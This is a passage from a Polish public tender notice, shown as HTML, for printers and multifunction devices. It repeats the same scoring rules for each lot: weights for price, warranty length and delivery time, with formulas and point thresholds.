punktów;<br/>•	oferta zawierająca deklarowany „Okres udzielonej gwarancji” - w przedziale<br/> ≥ 48 miesięcy – 30 punktów.<br/>Zakres udzielonej gwarancji przez cały oferowany okres musi być tożsamy z zakresem wymaganej 24 miesięcznej gwarancji.<br/><br/>c)	dla kryterium – Termin dostawy „D” (wyrażony w pełnych dniach kalendarzowych – liczbie całkowitej). <br/>	Kryterium - „Termin dostawy” będzie oceniane na podstawie zadeklarowanego przez Wykonawcę w treści Formularza ofertowego „Terminu dostawy”.<br/>Wykonawca zobowiązany jest wypełnić Formularz ofertowy - odpowiednio wpisać do rubryki Formularza ofertowego &lt;Termin dostawy&gt; liczbę dni kalendarzowych, jednak nie dłużej niż 30 dni, w jakim Wykonawca zobowiązuje się dostarczyć przedmiot umowy. Przy przyznawaniu i przeliczaniu punktów będą brane pod uwagę tylko te oferty w których zostanie zaproponowany termin dostawy krótszy niż 30 dni kalendarzowych.<br/>Proponowane przyznawanie i przeliczanie punktów w ramach tego kryterium wyboru ofert:<br/>	oferta zawierająca w przedziale 1 ÷ 15 dni kalendarzowych deklarowanego „Terminu dostawy” – 10 punktów;<br/>	oferta zawierająca w przedziale 16 ÷ 29 dni kalendarzowych deklarowanego „Terminu dostawy” – 5 punktów;<br/>	oferta zawierająca 30 dni kalendarzowych deklarowanego „Terminu dostawy” – 0 punktów.<br/>Maksymalny Termin dostawy wynosi 30 dni kalendarzowych licząc od dnia następnego po dniu zawarcia umowy.<br/>	W przypadku gdy Wykonawca zadeklaruje „Termin dostawy” dłuższy niż 30 dni kalendarzowych od daty zawarcia umowy oferta Wykonawcy będzie podlegała odrzuceniu.<br/><br/>d) łączna ilość punktów ocenianej oferty (łączna punktacja): <br/><br/>W = C +G +D<br/><br/>gdzie: <br/>W – łączna wartość punktowa przyznana ocenianej ofercie w ocenie końcowej<br/>C – wartość punktowa za Cenę brutto oferty „C”<br/>G – wartość punktowa za Okres udzielonej gwarancji „G”<br/>D – wartość punktowa za Termin dostawy „D”.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres udzielonej gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin dostawey</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie nr 3 – Drukarka laserowa lub LED monochromatyczna z interfejsem sieciowym i dodatkowym wyposażeniem zgodna z OPZ; </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30232100-5 - Drukarki i plotery</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">30232110-8 - Drukarki laserowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Dla zadań nr 2, 3, 4, 5, 6 i 7.<br/>a.	Cena brutto oferty „C” - 60 %<br/>b.	Okres udzielonej gwarancji „G” -30 %<br/>c.	Termin dostawy „D” - 10 %.<br/>Przy dokonywaniu oceny komisja przetargowa posłuży się następującymi wzorami:<br/>a)	dla kryterium – Cena brutto oferty „C”: <br/><br/> C N<br/>C = -------- x 60 pkt.<br/> Co<br/><br/> gdzie:<br/>C – wartość punktowa przyznana ocenianej ofercie w kryterium „Cena”, <br/>CN - najniższa cena ofertowa (brutto) badanego zadania spośród wszystkich ofert podlegających ocenie, <br/>Co - cena oferty ocenianej (brutto). <br/>Uzyskana liczba punktów w ramach kryterium „Cena” zaokrąglana będzie do drugiego miejsca po przecinku.<br/><br/>b)	dla kryterium – Okres udzielonej gwarancji „G” (wyrażony w pełnych miesiącach - liczbie całkowitej), powyżej minimalnych warunków (wymagane minimum 24 miesiące). <br/>W kryterium - „Okres udzielonej gwarancji” oceniany będzie zadeklarowany (tzn. wpisany w treści Formularza ofertowego) przez Wykonawcę czas obowiązywania gwarancji na dostarczony sprzęt.<br/>Minimalny wymagany „Okres udzielonej gwarancji” wynosi 24 miesiące, maksymalny 48 miesięcy, licząc od daty podpisania bez zastrzeżeń protokołu odbioru przedmiotu zamówienia. W przypadku gdy Wykonawca zadeklaruje „Okres udzielonej gwarancji” dłuższy niż 48 miesięcy, ocenie będzie podlegał okres 48 miesięcy.<br/>Natomiast w przypadku gdy Wykonawca zadeklaruje „Okres udzielonej gwarancji” krótszy niż 24 miesięcy oferta Wykonawcy będzie podlegała odrzuceniu.<br/>Punkty w niniejszym kryterium zostaną przyznane za wydłużenie czasu obejmowania sprzętu gwarancją powyżej 24 miesięcy od daty dostarczenia przedmiotu umowy potwierdzonej podpisanym bez zastrzeżeń protokołem odbioru przedmiotu zamówienia, zgodnie z załącznikiem nr 3 do projektu umowy. <br/>Punktacja Wykonawcom przypisana zostanie odpowiednio według poniższych wytycznych:<br/>•	oferta zawierająca deklarowany „Okres udzielonej gwarancji” - w przedziale ≥ 24≤ 35 miesięcy – 0 punktów;<br/>•	oferta zawierająca deklarowany „Okres udzielonej gwarancji” - w przedziale<br/> ≥ 36 ≤ 47 miesięcy – 15 punktów;<br/>•	oferta zawierająca deklarowany „Okres udzielonej gwarancji” - w przedziale<br/> ≥ 48 miesięcy – 30 punktów.<br/>Zakres udzielonej gwarancji przez cały oferowany okres musi być tożsamy z zakresem wymaganej 24 miesięcznej gwarancji.<br/><br/>c)	dla kryterium – Termin dostawy „D” (wyrażony w pełnych dniach kalendarzowych – liczbie całkowitej). <br/>	Kryterium - „Termin dostawy” będzie oceniane na podstawie zadeklarowanego przez Wykonawcę w treści Formularza ofertowego „Terminu dostawy”.<br/>Wykonawca zobowiązany jest wypełnić Formularz ofertowy - odpowiednio wpisać do rubryki Formularza ofertowego &lt;Termin dostawy&gt; liczbę dni kalendarzowych, jednak nie dłużej niż 30 dni, w jakim Wykonawca zobowiązuje się dostarczyć przedmiot umowy. Przy przyznawaniu i przeliczaniu punktów będą brane pod uwagę tylko te oferty w których zostanie zaproponowany termin dostawy krótszy niż 30 dni kalendarzowych.<br/>Proponowane przyznawanie i przeliczanie punktów w ramach tego kryterium wyboru ofert:<br/>	oferta zawierająca w przedziale 1 ÷ 15 dni kalendarzowych deklarowanego „Terminu dostawy” – 10 punktów;<br/>	oferta zawierająca w przedziale 16 ÷ 29 dni kalendarzowych deklarowanego „Terminu dostawy” – 5 punktów;<br/>	oferta zawierająca 30 dni kalendarzowych deklarowanego „Terminu dostawy” – 0 punktów.<br/>Maksymalny Termin dostawy wynosi 30 dni kalendarzowych licząc od dnia następnego po dniu zawarcia umowy.<br/>	W przypadku gdy Wykonawca zadeklaruje „Termin dostawy” dłuższy niż 30 dni kalendarzowych od daty zawarcia umowy oferta Wykonawcy będzie podlegała odrzuceniu.<br/><br/>d) łączna ilość punktów ocenianej oferty (łączna punktacja): <br/><br/>W = C +G +D<br/><br/>gdzie: <br/>W – łączna wartość punktowa przyznana ocenianej ofercie w ocenie końcowej<br/>C – wartość punktowa za Cenę brutto oferty „C”<br/>G – wartość punktowa za Okres udzielonej gwarancji „G”<br/>D – wartość punktowa za Termin dostawy „D”.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres udzielonej gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie nr 4 – Urządzenie wielofunkcyjne monochromatyczne laserowe lub LED z dodatkowym wyposażeniem zgodne z OPZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30232110-8 - Drukarki laserowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">30232100-5 - Drukarki i plotery</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Dla zadań nr 2, 3, 4, 5, 6 i 7.<br/>a.	Cena brutto oferty „C” - 60 %<br/>b.	Okres udzielonej gwarancji „G” -30 %<br/>c.	Termin dostawy „D” - 10 %.<br/>Przy dokonywaniu oceny komisja przetargowa posłuży się następującymi wzorami:<br/>a)	dla kryterium – Cena brutto oferty „C”: <br/><br/> C N<br/>C = -------- x 60 pkt.<br/> Co<br/><br/> gdzie:<br/>C – wartość punktowa przyznana ocenianej ofercie w kryterium „Cena”, <br/>CN - najniższa cena ofertowa (brutto) badanego zadania spośród wszystkich ofert podlegających ocenie, <br/>Co - cena oferty ocenianej (brutto). <br/>Uzyskana liczba punktów w ramach kryterium „Cena” zaokrąglana będzie do drugiego miejsca po przecinku.<br/><br/>b)	dla kryterium – Okres udzielonej gwarancji „G” (wyrażony w pełnych miesiącach - liczbie całkowitej), powyżej minimalnych warunków (wymagane minimum 24 miesiące). <br/>W kryterium - „Okres udzielonej gwarancji” oceniany będzie zadeklarowany (tzn. wpisany w treści Formularza ofertowego) przez Wykonawcę czas obowiązywania gwarancji na dostarczony sprzęt.<br/>Minimalny wymagany „Okres udzielonej gwarancji” wynosi 24 miesiące, maksymalny 48 miesięcy, licząc od daty podpisania bez zastrzeżeń protokołu odbioru przedmiotu zamówienia. W przypadku gdy Wykonawca zadeklaruje „Okres udzielonej gwarancji” dłuższy niż 48 miesięcy, ocenie będzie podlegał okres 48 miesięcy.<br/>Natomiast w przypadku gdy Wykonawca zadeklaruje „Okres udzielonej gwarancji” krótszy niż 24 miesięcy oferta Wykonawcy będzie podlegała odrzuceniu.<br/>Punkty w niniejszym kryterium zostaną przyznane za wydłużenie czasu obejmowania sprzętu gwarancją powyżej 24 miesięcy od daty dostarczenia przedmiotu umowy potwierdzonej podpisanym bez zastrzeżeń protokołem odbioru przedmiotu zamówienia, zgodnie z załącznikiem nr 3 do projektu umowy. <br/>Punktacja Wykonawcom przypisana zostanie odpowiednio według poniższych wytycznych:<br/>•	oferta zawierająca deklarowany „Okres udzielonej gwarancji” - w przedziale ≥ 24≤ 35 miesięcy – 0 punktów;<br/>•	oferta zawierająca deklarowany „Okres udzielonej gwarancji” - w przedziale<br/> ≥ 36 ≤ 47 miesięcy – 15 punktów;<br/>•	oferta zawierająca deklarowany „Okres udzielonej gwarancji” - w przedziale<br/> ≥ 48 miesięcy – 30 punktów.<br/>Zakres udzielonej gwarancji przez cały oferowany okres musi być tożsamy z zakresem wymaganej 24 miesięcznej gwarancji.<br/><br/>c)	dla kryterium – Termin dostawy „D” (wyrażony w pełnych dniach kalendarzowych – liczbie całkowitej). <br/>	Kryterium - „Termin dostawy” będzie oceniane na podstawie zadeklarowanego przez Wykonawcę w treści Formularza ofertowego „Terminu dostawy”.<br/>Wykonawca zobowiązany jest wypełnić Formularz ofertowy - odpowiednio wpisać do rubryki Formularza ofertowego &lt;Termin dostawy&gt; liczbę dni kalendarzowych, jednak nie dłużej niż 30 dni, w jakim Wykonawca zobowiązuje się dostarczyć przedmiot umowy. Przy przyznawaniu i przeliczaniu punktów będą brane pod uwagę tylko te oferty w których zostanie zaproponowany termin dostawy krótszy niż 30 dni kalendarzowych.<br/>Proponowane przyznawanie i przeliczanie punktów w ramach tego kryterium wyboru ofert:<br/>	oferta zawierająca w przedziale 1 ÷ 15 dni kalendarzowych deklarowanego „Terminu dostawy” – 10 punktów;<br/>	oferta zawierająca w przedziale 16 ÷ 29 dni kalendarzowych deklarowanego „Terminu dostawy” – 5 punktów;<br/>	oferta zawierająca 30 dni kalendarzowych deklarowanego „Terminu dostawy” – 0 punktów.<br/>Maksymalny Termin dostawy wynosi 30 dni kalendarzowych licząc od dnia następnego po dniu zawarcia umowy.<br/>	W przypadku gdy Wykonawca zadeklaruje „Termin dostawy” dłuższy niż 30 dni kalendarzowych od daty zawarcia umowy oferta Wykonawcy będzie podlegała odrzuceniu.<br/><br/>d) łączna ilość punktów ocenianej oferty (łączna punktacja): <br/><br/>W = C +G +D<br/><br/>gdzie: <br/>W – łączna wartość punktowa przyznana ocenianej ofercie w ocenie końcowej<br/>C – wartość punktowa za Cenę brutto oferty „C”<br/>G – wartość punktowa za Okres udzielonej gwarancji „G”<br/>D – wartość punktowa za Termin dostawy „D”.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres udzielonej gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie nr 5 – Urządzenie wielofunkcyjne laserowe lub LED kolorowe A3 z dodatkowym wyposażeniem zgodne z OPZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30232110-8 - Drukarki laserowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">30232100-5 - Drukarki i plotery</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Dla zadań nr 2, 3, 4, 5, 6 i 7.<br/>a.	Cena brutto oferty „C” - 60 %<br/>b.	Okres udzielonej gwarancji „G” -30 %<br/>c.	Termin dostawy „D” - 10 %.<br/>Przy dokonywaniu oceny komisja przetargowa posłuży się następującymi wzorami:<br/>a)	dla kryterium – Cena brutto oferty „C”: <br/><br/> C N<br/>C = -------- x 60 pkt.<br/> Co<br/><br/> gdzie:<br/>C – wartość punktowa przyznana ocenianej ofercie w kryterium „Cena”, <br/>CN - najniższa cena ofertowa (brutto) badanego zadania spośród wszystkich ofert podlegających ocenie, <br/>Co - cena oferty ocenianej (brutto). <br/>Uzyskana liczba punktów w ramach kryterium „Cena” zaokrąglana będzie do drugiego miejsca po przecinku.<br/><br/>b)	dla kryterium – Okres udzielonej gwarancji „G” (wyrażony w pełnych miesiącach - liczbie całkowitej), powyżej minimalnych warunków (wymagane minimum 24 miesiące). <br/>W kryterium - „Okres udzielonej gwarancji” oceniany będzie zadeklarowany (tzn. wpisany w treści Formularza ofertowego) przez Wykonawcę czas obowiązywania gwarancji na dostarczony sprzęt.<br/>Minimalny wymagany „Okres udzielonej gwarancji” wynosi 24 miesiące, maksymalny 48 miesięcy, licząc od daty podpisania bez zastrzeżeń protokołu odbioru przedmiotu zamówienia. W przypadku gdy Wykonawca zadeklaruje „Okres udzielonej gwarancji” dłuższy niż 48 miesięcy, ocenie będzie podlegał okres 48 miesięcy.<br/>Natomiast w przypadku gdy Wykonawca zadeklaruje „Okres udzielonej gwarancji” krótszy niż 24 miesięcy oferta Wykonawcy będzie podlegała odrzuceniu.<br/>Punkty w niniejszym kryterium zostaną przyznane za wydłużenie czasu obejmowania sprzętu gwarancją powyżej 24 miesięcy od daty dostarczenia przedmiotu umowy potwierdzonej podpisanym bez zastrzeżeń protokołem odbioru przedmiotu zamówienia, zgodnie z załącznikiem nr 3 do projektu umowy. <br/>Punktacja Wykonawcom przypisana zostanie odpowiednio według poniższych wytycznych:<br/>•	oferta zawierająca deklarowany „Okres udzielonej gwarancji” - w przedziale ≥ 24≤ 35 miesięcy – 0 punktów;<br/>•	oferta zawierająca deklarowany „Okres udzielonej gwarancji” - w przedziale<br/> ≥ 36 ≤ 47 miesięcy – 15 punktów;<br/>•	oferta zawierająca deklarowany „Okres udzielonej gwarancji” - w przedziale<br/> ≥ 48 miesięcy – 30 punktów.<br/>Zakres udzielonej gwarancji przez cały oferowany okres musi być tożsamy z zakresem wymaganej 24 miesięcznej gwarancji.<br/><br/>c)	dla kryterium – Termin dostawy „D” (wyrażony w pełnych dniach kalendarzowych – liczbie całkowitej). <br/>	Kryterium - „Termin dostawy” będzie oceniane na podstawie zadeklarowanego przez Wykonawcę w treści Formularza ofertowego „Terminu dostawy”.<br/>Wykonawca zobowiązany jest wypełnić Formularz ofertowy - odpowiednio wpisać do rubryki Formularza ofertowego &lt;Termin dostawy&gt; liczbę dni kalendarzowych, jednak nie dłużej niż 30 dni, w jakim Wykonawca zobowiązuje się dostarczyć przedmiot umowy. Przy przyznawaniu i przeliczaniu punktów będą brane pod uwagę tylko te oferty w których zostanie zaproponowany termin dostawy krótszy niż 30 dni kalendarzowych.<br/>Proponowane przyznawanie i przeliczanie punktów w ramach tego kryterium wyboru ofert:<br/>	oferta zawierająca w przedziale 1 ÷ 15 dni kalendarzowych deklarowanego „Terminu dostawy” – 10 punktów;<br/>	oferta zawierająca w przedziale 16 ÷ 29 dni kalendarzowych deklarowanego „Terminu dostawy” – 5 punktów;<br/>	oferta zawierająca 30 dni kalendarzowych deklarowanego „Terminu dostawy” – 0 punktów.<br/>Maksymalny Termin dostawy wynosi 30 dni kalendarzowych licząc od dnia następnego po dniu zawarcia umowy.<br/>	W przypadku gdy Wykonawca zadeklaruje „Termin dostawy” dłuższy niż 30 dni kalendarzowych od daty zawarcia umowy oferta Wykonawcy będzie podlegała odrzuceniu.<br/><br/>d) łączna ilość punktów ocenianej oferty (łączna punktacja): <br/><br/>W = C +G +D<br/><br/>gdzie: <br/>W – łączna wartość punktowa przyznana ocenianej ofercie w ocenie końcowej<br/>C – wartość punktowa za Cenę brutto oferty „C”<br/>G – wartość punktowa za Okres udzielonej gwarancji „G”<br/>D – wartość punktowa za Termin dostawy „D”.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres udzielonej gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie nr 6 – Urządzenie wielofunkcyjne atramentowe kolorowe z dodatkowym wyposażeniem zgodne z OPZ; </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30232130-4 - Kolorowe drukarki atramentowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Dla zadań nr 2, 3, 4, 5, 6 i 7.<br/>a.	Cena brutto oferty „C” - 60 %<br/>b.	Okres udzielonej gwarancji „G” -30 %<br/>c.	Termin dostawy „D” - 10 %.<br/>Przy dokonywaniu oceny komisja przetargowa posłuży się następującymi wzorami:<br/>a)	dla kryterium – Cena brutto oferty „C”: <br/><br/> C N<br/>C = -------- x 60 pkt.<br/> Co<br/><br/> gdzie:<br/>C – wartość punktowa przyznana ocenianej ofercie w kryterium „Cena”, <br/>CN - najniższa cena ofertowa (brutto) badanego zadania spośród wszystkich ofert podlegających ocenie, <br/>Co - cena oferty ocenianej (brutto). <br/>Uzyskana liczba punktów w ramach kryterium „Cena” zaokrąglana będzie do drugiego miejsca po przecinku.<br/><br/>b)	dla kryterium – Okres udzielonej gwarancji „G” (wyrażony w pełnych miesiącach - liczbie całkowitej), powyżej minimalnych warunków (wymagane minimum 24 miesiące). <br/>W kryterium - „Okres udzielonej gwarancji” oceniany będzie zadeklarowany (tzn. wpisany w treści Formularza ofertowego) przez Wykonawcę czas obowiązywania gwarancji na dostarczony sprzęt.<br/>Minimalny wymagany „Okres udzielonej gwarancji” wynosi 24 miesiące, maksymalny 48 miesięcy, licząc od daty podpisania bez zastrzeżeń protokołu odbioru przedmiotu zamówienia. W przypadku gdy Wykonawca zadeklaruje „Okres udzielonej gwarancji” dłuższy niż 48 miesięcy, ocenie będzie podlegał okres 48 miesięcy.<br/>Natomiast w przypadku gdy Wykonawca zadeklaruje „Okres udzielonej gwarancji” krótszy niż 24 miesięcy oferta Wykonawcy będzie podlegała odrzuceniu.<br/>Punkty w niniejszym kryterium zostaną przyznane za wydłużenie czasu obejmowania sprzętu gwarancją powyżej 24 miesięcy od daty dostarczenia przedmiotu umowy potwierdzonej podpisanym bez zastrzeżeń protokołem odbioru przedmiotu zamówienia, zgodnie z załącznikiem nr 3 do projektu umowy. <br/>Punktacja Wykonawcom przypisana zostanie odpowiednio według poniższych wytycznych:<br/>•	oferta zawierająca deklarowany „Okres udzielonej gwarancji” - w przedziale ≥ 24≤ 35 miesięcy – 0 punktów;<br/>•	oferta zawierająca deklarowany „Okres udzielonej gwarancji” - w przedziale<br/> ≥ 36 ≤ 47 miesięcy – 15 punktów;<br/>•	oferta zawierająca deklarowany „Okres udzielonej gwarancji” - w przedziale<br/> ≥ 48 miesięcy – 30 punktów.<br/>Zakres udzielonej gwarancji przez cały oferowany okres musi być tożsamy z zakresem wymaganej 24 miesięcznej gwarancji.<br/><br/>c)	dla kryterium – Termin dostawy „D” (wyrażony w pełnych dniach kalendarzowych – liczbie całkowitej). <br/>	Kryterium - „Termin dostawy” będzie oceniane na podstawie zadeklarowanego przez Wykonawcę w treści Formularza ofertowego „Terminu dostawy”.<br/>Wykonawca zobowiązany jest wypełnić Formularz ofertowy - odpowiednio wpisać do rubryki Formularza ofertowego &lt;Termin dostawy&gt; liczbę dni kalendarzowych, jednak nie dłużej niż 30 dni, w jakim Wykonawca zobowiązuje się dostarczyć przedmiot umowy. Przy przyznawaniu i przeliczaniu punktów będą brane pod uwagę tylko te oferty w których zostanie zaproponowany termin dostawy krótszy niż 30 dni kalendarzowych.<br/>Proponowane przyznawanie i przeliczanie punktów w ramach tego kryterium wyboru ofert:<br/>	oferta zawierająca w przedziale 1 ÷ 15 dni kalendarzowych deklarowanego „Terminu dostawy” – 10 punktów;<br/>	oferta zawierająca w przedziale 16 ÷ 29 dni kalendarzowych deklarowanego „Terminu dostawy” – 5 punktów;<br/>	oferta zawierająca 30 dni kalendarzowych deklarowanego „Terminu dostawy” – 0 punktów.<br/>Maksymalny Termin dostawy wynosi 30 dni kalendarzowych licząc od dnia następnego po dniu zawarcia umowy.<br/>	W przypadku gdy Wykonawca zadeklaruje „Termin dostawy” dłuższy niż 30 dni kalendarzowych od daty zawarcia umowy oferta Wykonawcy będzie podlegała odrzuceniu.<br/><br/>d) łączna ilość punktów ocenianej oferty (łączna punktacja): <br/><br/>W = C +G +D<br/><br/>gdzie: <br/>W – łączna wartość punktowa przyznana ocenianej ofercie w ocenie końcowej<br/>C – wartość punktowa za Cenę brutto oferty „C”<br/>G – wartość punktowa za Okres udzielonej gwarancji „G”<br/>D – wartość punktowa za Termin dostawy „D”.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres udzielonej gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub 